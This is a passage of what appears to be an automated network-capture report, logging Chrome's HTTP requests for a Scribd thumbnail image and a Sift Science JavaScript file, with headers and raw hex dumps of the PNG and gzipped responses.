                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740030-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC40INData Raw: 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 6d 65 73 73 61 67 65 22 3a 22 73 75 63 63 65 73 73 22 7d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"status_code":200,"message":"success"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        118192.168.2.1649858151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC411OUTGET /img/word_document/356032151/149x198/db7a11388a/1731623834?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 22143
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 62
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 169682
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100151-CHI, cache-ewr-kewr1740058-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 10, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522381.606640,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 f0 22 23 ee 41 2a f0 2e 25 ea 24 2a f0 26 25 f0 22 26 f0 3b 2a f0 20 2d f0 1e 37 ef 20 29 f2 22 25 2b 3b 9b f4 34 29 eb 2a 22 ec 3c 27 f1 43 2a f1 33 26 ed 24 23 eb 24 32 29 3d 92 f4 2e 27 f0 4c 2a f5 1e 2d ba e3 e9 f5 4b 2a c7 e3 f4 f2 68 3d f5 3a 2a f4 5c 35 d4 e9 f5 31 3f 9d 36 4b a7 d7 f3 fb f5 f6 f3 f2 52 2d ef 5e 35 d7 f3 f5 ea 4e 2c e8 43 2a a8 e1 e6 f4 27 26 ef 67 3c ec 32 25 f8 1f 23 9e d6 ea 9f df eb bb dc f2 3f 50 a8 29 35 94 2d 41 9a 96 d6 e8 f9 5c 36 99 dc e2 39 43 9b f0 33 2a c7 e9 e9 c7 ec f5 f2 70 46 fd fb fc e1 f4 fb cd ee f3 98 d5
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTE"#A*.%$*&%"&;* -7 )"%+;4)*"<'C*3&$#$2)=.'L*-K*h=:*\51?6KR-^5N,C*'&g<2%#?P)5-A\69C3*pF
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 95 52 28 9d 95 a4 83 d3 80 54 99 3b f1 de 60 d2 ff 2a 67 93 a7 3b 95 a2 72 94 93 91 cb 2a a4 dc 54 c6 a4 c3 39 e5 46 65 36 1d 37 62 e1 60 e0 50 71 52 50 97 96 02 ef 8b 10 94 88 1d e6 b6 bc 5e e5 b9 22 c2 4f 94 e3 a4 84 e2 24 4c c9 b9 30 c5 29 09 9a cf 7d 3c 3c 0e 09 72 2c 99 22 f9 03 65 a7 a0 22 9f c4 16 b3 38 7b 70 b8 5c 29 84 5e 29 5d 58 38 e7 04 aa 57 8a c4 66 95 65 96 55 92 33 5e 26 96 a5 0b 57 20 62 f2 f8 aa aa cc 54 a6 56 b3 b2 5a e4 4d 92 cc 38 b5 ac 24 4b 82 50 09 d6 0a 98 da 5e c6 cb b2 5e fe 89 cc 12 98 2c f2 24 26 81 23 07 1e 0b 13 1c c3 51 06 de 29 09 bc 28 a7 64 82 8c 46 25 82 7e 10 95 48 1a c7 49 5b 94 11 60 32 15 95 49 29 f5 c0 49 4a b4 4c 12 a8 9c 10 21 4c 66 38 23 2b a7 24 44 8a f2 70 97 3c 23 18 11 c1 29 0b e5 57 54 e5 46 ad 1a 81 58 f0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: R(T;`*g;r*T9Fe67b`PqRP^"O$L0)}<<r,"e"8{p\)^)]X8WfeU3^&W bTVZM8$KP^^,$&#Q)(dF%~HI[`2I)IJL!Lf8#+$Dp<#)WTFX
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: c6 23 30 e7 80 6a 1b d4 4a a5 62 1e cd 8e 8d 75 af ac dc be 3d 79 37 30 6f d3 98 cd 1a ce 29 cb 82 ce 40 d2 c5 ce 0f 63 c5 94 fa c3 b5 1b ed 82 0a 03 2a 5c 3a 00 aa 21 9f 6f 6a f3 44 e0 f4 7a 15 98 b5 a9 94 5c 01 4c 20 f3 4a 51 95 2f a9 6e 16 55 05 56 91 36 dc 92 6f 29 a4 26 b2 ed de 5d b6 dd cc ec d5 fb a7 fd dd 40 b5 f2 6d 42 63 d3 94 42 9f e7 93 ea 62 7f b8 46 55 fc 47 27 6d 6d f6 b9 9b 9a da fa 2c 69 c6 a6 d2 68 38 8d c1 6c 36 f7 9e ab f2 9d 85 ee e5 29 a9 2a 2a e6 93 60 c9 79 ac 1e 87 6b d8 ed 00 e2 7c 49 e5 d8 5d 56 d9 76 f6 eb 6b 67 fb eb ee 7c bf 72 f7 27 d9 ac 31 5f 55 95 60 e8 f5 aa b3 f1 2d 5c 84 73 06 26 d6 d7 14 69 6a 6b b3 6c a7 33 f2 bc d9 ac 02 bf 52 65 2b a2 54 b6 83 85 ce 96 96 ce 16 eb b6 e7 fd 1f 2b be b9 d9 3b 9f cd 7b 3c 56 6b 69 18
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: #0jJbu=y70o)@c*\:!ojDz\L JQ/nUV6o)&]@mBcBbFUG'mm,ih8l6)**`yk|I]Vvkg|r'1_U`-\s&ijkl3Re+T+;{<Vki
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: d4 98 7d d9 c5 84 06 51 a9 dc ad ed 9a 45 bb 81 c2 d4 5a fb d1 d8 84 05 ec 6e b9 7c 67 66 a6 23 7c 7b 7c fc 76 9f 0b e6 d6 d8 73 5a 84 a8 a0 91 89 a1 46 56 94 b9 7e d4 0a a0 a0 d9 65 56 e2 2a 37 2a cf d9 85 d3 a3 d2 13 96 75 7e 8a 2b bb 3d ab b6 91 4b 85 95 74 88 e3 d4 34 4f 65 e4 33 a8 d5 1a 0c 06 2a 45 22 2a 12 8e 41 9b 11 e8 45 50 e7 61 23 6a 40 2b 8a 32 24 d3 53 93 79 8b c5 32 d2 71 e7 ee 6d 78 cc 8c 87 3b fa bc fd 5d 3a c7 31 2d 25 a0 c3 42 8b d5 4b 10 16 80 21 2a c1 51 17 79 af e9 f5 7a 68 50 72 91 e8 65 74 51 a9 8a 6b cc 05 a5 39 1e 2f 64 13 89 7a 28 99 68 b7 c7 cd 11 27 a5 56 1b 92 88 aa a7 a7 c7 67 f4 a5 d2 0a 14 f6 94 d1 78 ed 1a 9c 36 8c 0b 87 d1 05 9f af de 48 1a 17 12 9a c4 81 c2 c0 07 3b 99 b7 59 3a c2 33 33 68 ce ba 33 73 7b d4 65 72 c3 58
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: }QEZn|gf#|{|vsZFV~eV*7*u~+=Kt4Oe3*E"*AEPa#j@+2$Sy2qmx;]:1-%BK!*QyzhPretQk9/dz(h'Vgx6H;Y:33h3s{erX
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 88 3f 6a 32 39 dc ca b0 0f aa 8b 8a 0a be 26 18 d9 41 8b 8a 5c 36 3e bf d5 ea d2 e9 28 3d 6c 04 70 d2 f0 78 55 3e 7f 9d df 57 55 55 a5 f7 1d 1e ec 8d c0 44 19 5f 1a 87 f1 49 b4 9a 34 84 99 ed 30 7c f4 78 b2 92 e9 4f 59 f9 73 c6 40 ef fc 48 de b5 91 43 2e 97 bf 65 b9 a4 0c 11 e9 c3 21 cb 42 51 4e a7 41 d1 32 1c d6 e9 f6 45 5a 55 41 46 ee 03 73 23 e7 82 eb 55 86 5c bb 6f c7 30 2a 28 ef 36 79 d0 39 1c bf d2 c6 17 72 5b d4 5a d3 0e 82 91 38 1f e7 af 3b 2f d0 2a 7a 4f 67 8e 1b 6f 0e 09 af e0 92 54 1d 7a 1e 2f 32 75 e4 29 8a 56 25 ff 46 95 44 df 21 24 2d ce 2b f0 56 9b 32 2f 4d 19 e2 f6 f2 6d ce ab 23 21 63 41 6b e0 85 e5 eb 1c 8a 28 30 0e 87 11 dd 7e b3 b6 8c 80 ee 79 cd 8c 72 c8 b8 bc 4c fd c2 ce b1 7b 82 b5 2d 84 07 9d 10 0a 2b 84 78 20 a8 56 ab d4 d1 46 25
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ?j29&A\6>(=lpxU>WUUD_I40|xOYs@HC.e!BQNA2EZUAFs#U\o0*(6y9r[Z8;/*zOgoTz/2u)V%FD!$-+V2/Mm#!cAk(0~yrL{-+x VF%
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 63 f7 7a 65 5f a7 f3 d1 26 14 c5 b0 8f d2 27 8d fe 5f ba 46 5b 2b 9f af 21 56 a1 a8 1c 0e f9 17 1e 87 ef ed 41 47 0e a5 d3 35 3a 5b 8c 0a 72 76 fe fc a8 65 23 1a c9 be 53 52 52 92 6d 35 94 d0 71 27 1e 75 44 fc 0b 45 3a f7 9a 3c cb 34 e5 da 59 2d 2e 36 c9 4b dd 76 e5 60 90 0b bf 15 8e e0 de b5 37 2e b7 63 37 2b ab 32 37 2b ab 59 d3 c2 f6 d8 9d 47 f4 0d ff 41 7f cf d3 bf 3e 7f 36 fd f2 e5 b7 4f fe f2 d3 0f d3 d3 bf 4c cf 0e 0c dc fd e9 e7 e7 27 4f 61 33 7d d8 e9 bb 21 10 72 d9 74 93 68 f3 fe 7d c1 1b d3 1f 36 32 c5 e9 28 b4 32 89 5c 25 b1 ce b3 be 73 99 a3 cb 77 18 4d fd f1 71 49 3d c3 ca 8e c6 dd b0 e5 51 6b d7 33 4c 53 3a 74 63 b7 36 b0 1e a0 20 57 36 49 95 80 27 90 18 d7 cc 24 fa 7a 27 2e 6a be be db de ae 9d 54 58 49 bb eb 00 1a 99 d8 e6 c7 6f bf 9c 2d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: cze_&'_F[+!VAG5:[rve#SRRm5q'uDE:<4Y-.6Kv`7.c7+27+YGA>6OL'Oa3}!rth}62(2\%swMqI=Qk3LS:tc6 W6I'$z'.jTXIo-
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: c9 6f 4f 8e 67 9b 9a 6e 3a 80 aa cd 6c 16 01 15 14 f0 ee 02 6e 1a 51 f7 8c 1a ed d1 08 64 0a fc 28 4d 23 2a f9 88 c7 ad 85 3c f1 b4 2d 93 11 0f 97 49 00 95 c1 a0 68 84 90 37 ca b9 ad 79 94 c7 83 fd c7 fe b5 13 c7 8e 1d eb ef ef df d5 bb 43 55 b5 75 fe 7a c5 71 2b b8 0e 85 5c 77 94 a0 98 db 5e d6 e1 57 6b 64 7d ed 0d 6d b8 e5 b3 9e 93 7f ff f6 64 f1 6b 44 d5 27 40 0f 02 88 ba 52 20 2a db 4a 01 37 19 8d 34 6c d4 fa 9e 39 91 4b 2a d3 34 b6 93 ab 16 76 e1 b5 44 9e 73 13 12 80 fa d0 60 40 50 8d 0c 30 73 89 fc 6e e4 51 c8 a5 fa d1 9b e1 e1 5d 2d c8 74 11 d5 5f ce 65 5f 0c b0 54 e5 4a e5 d6 a5 72 39 58 a9 94 0b b7 c0 4e f9 55 7f 4f 34 f4 c9 16 73 d8 67 17 d0 c8 56 7c 64 6b b2 65 37 fa 04 b2 77 54 36 5b d6 a1 13 b2 37 aa 71 41 ab 0f 61 b1 54 12 ae 05 a8 48 d6 1e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: oOgn:lnQd(M#*<-Ih7yCUuzq+\w^Wkd}mdkD'@R *J74l9K*4vDs`@P0snQ]-t_e_TJr9XNUO4sgV|dke7wT6[7qAaTH
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: f3 73 6f de 9c 59 ba 33 50 8a 41 f3 77 a7 5b a1 c3 a1 20 92 90 33 5d ec 0d 34 67 55 b6 70 81 18 3d ce 65 d4 ff 47 75 dc 28 90 99 69 58 85 16 cc 88 59 10 55 22 09 73 b2 3b ad 90 54 a9 b8 01 20 02 a7 70 3f 83 5d 59 34 0a 63 71 34 90 56 2a 9d fe cc fc f9 e9 4f 4e 9c 38 01 e3 d5 1f af 5e ad e3 9c bb 7e 7a 6e 2b 03 99 72 2b 95 81 f0 d2 dc 2f 6b af d7 7e fc 71 ed f5 eb 5f e6 96 82 cb 31 97 92 cc 7b 7a 7a ba 47 69 10 ce 08 e0 79 62 6f c1 a1 b2 c1 1e a2 1b a8 98 87 ac da 6d 53 18 63 b1 58 18 cc 2e 30 e1 46 78 8f 61 58 77 87 14 fc 8a 18 eb b7 4e 46 29 89 f4 53 c3 a7 52 8a 9b 86 15 e8 22 dd 91 28 74 43 02 7e a8 0b e6 40 48 ac 55 2a 7d fe cc dc c4 f9 b3 57 21 59 30 f7 71 32 19 bf 0f 25 94 74 e7 17 a6 e6 d6 d6 32 c5 60 dc eb 8d 0f 3a 3e 5f 5b 9b 5b 7a 1c 85 6f 22 3f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: soY3PAw[ 3]4gUp=eGu(iXYU"s;T p?]Y4cq4V*ON8^~zn+r+/k~q_1{zzGiybomScX.0FxaXwNF)SR"(tC~@HU*}W!Y0q2%t2`:>_[[zo"?
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 11 95 94 94 e8 35 a0 b7 a0 70 85 31 07 34 20 65 1c c7 44 7f 1e 88 fb 50 1e aa 28 da 1d ff da 70 f4 15 6f f6 30 16 bb 9f 8a c5 d2 1f 0e d3 e9 58 2c 96 c2 df c3 95 e9 e8 7c a5 f2 0f 3a f1 55 c8 f7 b6 73 62 c9 55 bf c1 2c 70 cc aa 6c 40 25 16 1f 53 1d a9 be 04 35 80 b5 65 34 ca 85 9c 22 72 80 25 12 89 a5 5a bd 4a ba c1 77 99 40 87 c0 9c 2a 14 2c 1b 90 61 da e7 b7 b4 b4 70 67 f4 df a8 24 dd 4a df ce db 38 14 3b 38 02 a0 54 79 40 05 85 30 07 fd 0f b5 36 16 3d b4 db f7 22 7b a3 ee ee d1 88 2f 7d 7f 74 74 34 12 89 c0 2f 5f 7d 2a fa 8b 9d a5 e4 72 45 75 37 6e 68 98 2a 62 ce 28 30 1b 8d 2f 6d b6 e5 16 9b 52 fb 7e e7 b7 ce 72 cb a1 56 2b d5 29 c4 2a 95 93 51 c4 86 52 e7 f2 a3 66 49 55 17 0b 64 1b d0 3b 43 93 03 fb 51 28 85 fd 0b e1 4d 95 e3 45 88 25 3a 16 7c 48 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5p14 eDP(po0X,|:UsbU,pl@%S5e4"r%ZJw@*,apg$J8;8Ty@06="{/}tt4/_}*rEu7nh*b(0/mR~rV+)*QRfIUd;CQ(ME%:|H:
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 4b bf 94 e0 24 1d a3 94 17 0d 15 4c 93 f2 52 5e 56 8d 76 36 81 5a 2c 69 af 69 7c 81 a4 12 48 60 15 c2 9d 76 ab 11 27 48 b8 f7 66 66 d8 54 b9 d6 97 a6 12 50 17 3a 38 23 54 db 0c a4 a5 fd c0 84 ca 4e 34 50 10 f1 ba a1 26 ab bd 40 8a a3 17 96 b4 e0 1a 56 dd 7d ce 6d 3b c2 c4 49 3c 29 97 b6 1f da 5f 9f f3 3f cf cb 39 cf 05 2a 0c 13 4b 51 6b 4f 61 79 1a 3c 24 bc b7 4a 50 3d 7a e4 f2 f9 7c a8 c0 f6 84 7f 66 b9 08 eb c5 69 86 7f c0 8b 87 ab 36 95 cf 87 76 2e 61 8e 07 9d fe ee 3c 15 da b9 33 99 5a 5a e4 42 b5 ba b6 c5 22 ca 30 99 90 2e d5 2d 88 2e 03 4d 2e cc 9f c5 54 0c 21 23 e8 a1 b6 9b 7d a7 ca ca da bb 81 0b ed f8 d7 ae 68 b0 bd 9a 18 95 11 fe a4 a8 37 2b 2d 0d e5 56 09 4b 21 28 be c6 e9 27 55 24 a9 52 51 16 8e 60 00 07 8f 10 2c 4d d0 e0 53 c1 6c ae fe 95 a8
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K$LR^Vv6Z,ii|H`v'HffTP:8#TN4P&@V}m;I<)_?9*KQkOay<$JP=z|fi6v.a<3ZZB"0.-.M.T!#}h7+-VK!('U$RQ`,MSl


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        119192.168.2.164986034.96.67.2244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC347OUTGET /s.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: cdn.siftscience.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC939INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-generation: 1731608263721686
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-length: 26602
                                                                                                                                                                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: crc32c=37M6eg==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: md5=fXV9U0Dla7eh7Xytfy5wmw==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-storage-class: MULTI_REGIONAL
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 26602
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC4cPbRADO3dVT8q4vjvkbvybxk2mX_aQzpmhsJkzDKut6hs-3oVCJkXu5ntKK7yi-vl6yznT6AyoA
                                                                                                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 18:32:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Sat, 07 Dec 2024 18:32:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public,max-age=86400, no-transform
                                                                                                                                                                                                                                                                                                                                                                                        Age: 12416
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 18:17:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "7d757d5340e56bb7a1ed7cad7f2e709b"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC451INData Raw: 1f 8b 08 08 b4 34 36 67 02 ff 73 2e 6a 73 5f 2e 67 73 74 6d 70 00 cc bd 69 63 db 48 92 20 fa 7d 7e 05 85 ad 96 01 13 84 08 92 ba 00 41 1c 59 b2 ab 3c 63 d9 1e db 55 d5 b3 34 cb 03 91 20 05 0b 04 58 38 74 58 e4 fe f6 17 11 79 20 01 82 b2 ab 67 fa ed 76 bb 44 20 8f c8 44 1e 71 65 44 e4 de f3 e7 ff d2 7a de 7a 1d 4f a2 62 1a 64 ad 49 32 0d 5a b3 34 59 38 98 7c 9e 3e 2c f3 a4 f3 35 c3 97 eb 3c 5f 66 ce de de 3c cc af 8b 2b 6b 92 2c f6 ae d2 f0 7e 6f a2 16 7a 13 4e 82 38 0b a6 ad 22 9e 06 69 2b bf 0e 5a 97 af 3f b5 74 ac 0c 75 ef ee ee ac 64 09 25 92 22 9d 04 56 92 ce f7 22 56 23 db 5b 84 79 87 bf 58 cb eb a5 d1 12 2f 4f 74 f0 7d 54 cc c3 f8 22 c8 83 49 de ba ed 5a c7 96 8d c9 d8 cc 32 8c 23 7f fa 60 c5 41 be a7 16 13 0d ee 61 c1 51 eb 3f 8a 70 72 f3 29 5c 04
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 46gs.js_.gstmpicH }~AY<cU4 X8tXy gvD DqeDzzObdI2Z4Y8|>,5<_f<+k,~ozN8"i+Z?tud%"V"V#[yX/Ot}T"IZ2#`AaQ?pr)\
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1390INData Raw: 89 a3 87 4e 91 85 f1 5c 69 91 2a f5 7a f6 ff e2 bf df e9 41 6d 45 fe e6 c3 0c ed cd 00 64 90 2e d3 30 ce bf 66 3d 5a c9 c9 f2 21 a5 79 d3 27 46 ab d7 b5 8f 86 ad 7f 4b 62 3f 6b fd e2 fb f3 96 fe 15 9f ff 35 4a 96 d7 45 86 cb d2 68 ac b4 3f 6c 41 03 41 9c 87 31 3c 64 61 f4 10 dc b6 f4 5b 9e 64 dd f2 a4 7f 4d 8a 3c 4a 92 1b ec 91 f1 7f 61 57 34 8c 4b 65 44 6a 6f 79 1a 04 7b b7 fd 7f 62 47 f7 fe e5 5f 76 66 45 4c cb 5c 37 1e b5 22 0b 5a 59 9e 86 93 5c 73 6f fd b4 15 78 1a 36 08 dd 0a a6 da 8e 97 c3 ce 48 66 ad 79 94 5c f9 d1 a7 eb 30 1b 96 8f 4e 53 c9 3b da 33 43 f6 e3 6c 87 c5 e1 34 96 c8 82 68 36 c4 3f ce e3 da 15 9d 6d c5 7a 60 3c a6 41 5e a4 71 2b d8 dd 0d ac 2f 5f 82 ec 32 99 16 11 bc bd bb fa 0a 5b d7 5a a6 49 9e 20 14 0b 76 f6 bb bb f8 7d 0a 63 94 e6
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: N\i*zAmEd.0f=Z!y'FKb?k5JEh?lAA1<da[dM<JaW4KeDjoy{bG_vfEL\7"ZY\sox6Hfy\0NS;3Cl4h6?mz`<A^q+/_2[ZI v}c
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1390INData Raw: 32 0b 05 a3 a7 41 16 54 c8 16 6d e7 2f d8 11 af 1c 1f 86 d2 bf c4 17 90 cc b0 7a 77 6d 7e 01 3a 58 27 fe 1a fb f4 92 99 02 c2 af 07 de 9c f7 1a 7a 66 96 0d 58 0c a9 23 47 50 87 df 56 16 1c b4 04 84 6a 12 64 d9 06 fa cf 05 a6 27 78 b0 28 43 be 60 13 78 92 0b d6 67 65 ae 70 0c 3e 86 df 02 60 65 92 3d 7d f0 dc 37 80 93 d1 81 6a 0d 39 26 cc 0c 07 b8 14 ff 5e d7 bb ab cc e8 30 c8 8b 30 66 a3 48 55 bb 86 f1 dc 07 4c 84 dc 4c 0c 30 0a 33 31 90 a2 14 e5 1a 9d c2 9a 9c 9e 14 ee b4 ed f9 06 ef 5d f2 9e 7d 01 cd 83 9e 9a 53 c3 cd bd d4 ca 96 0c 63 9a 05 e2 11 d1 e1 8e 37 59 37 2d d1 c9 3f 86 a6 d9 64 aa c3 8e 45 75 c2 d2 d5 af 73 ba 6b c3 cd ac 5f fc ec 1a 58 a4 a5 5c 24 93 d9 dc 91 4b c6 a8 71 3a 01 5f 33 50 c8 13 0f a2 ac 98 59 5a 65 c0 22 9b 1b cb 6d c9 f2 94 8e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 2ATm/zwm~:X'zfX#GPVjd'x(C`xgep>`e=}7j9&^00fHULL031]}Sc7Y7-?dEusk_X\$Kq:_3PYZe"m
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1390INData Raw: ae 9e 9d 9c 24 2b d4 a0 f5 7b 9d c4 68 c7 6b 09 68 f2 04 a0 70 95 ef fe 9f 1f 05 34 dd 0e e8 8f fc 8f 1f 85 32 db 0a 25 ff 43 8f 57 d0 9b a7 01 c5 9c cf ad 88 1d 20 70 c2 52 41 81 a1 9a 29 25 08 28 20 d8 fb 14 01 30 ae 39 f3 62 5d 72 f6 28 fe 6e aa 87 0b 71 c6 e0 67 b0 12 d5 73 30 55 0f 03 9b d2 86 ed 28 55 e0 7c 9d 02 07 1c 12 03 2c 0a a6 a8 e9 8e cb 72 a3 7c 6c fc d0 61 5f 6c a6 a8 df 0e 46 e9 18 35 4b e3 72 3d 81 40 b8 45 e5 df b0 96 54 41 49 c7 c3 84 dc 83 76 16 61 16 18 86 ae cb 4f 83 99 51 4e 50 7c a1 eb 29 f4 d0 8a 41 be 40 c5 45 a9 c6 49 74 d4 47 ca d2 99 5a 9a 54 3c 4f 16 2f a4 00 e5 06 d6 14 36 c2 30 05 09 e7 16 8f ac 0c 47 47 05 17 3d 9b 78 46 90 e5 7e 3c 41 35 0a 6a d0 51 80 c9 95 3e 03 18 92 f0 0c c3 80 66 83 58 f7 4d 18 83 42 d7 43 2f 94 67
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $+{hkhp42%CW pRA)%( 09b]r(nqgs0U(U|,r|la_lF5Kr=@ETAIvaOQNP|)A@EItGZT<O/60GG=xF~<A5jQ>fXMBC/g
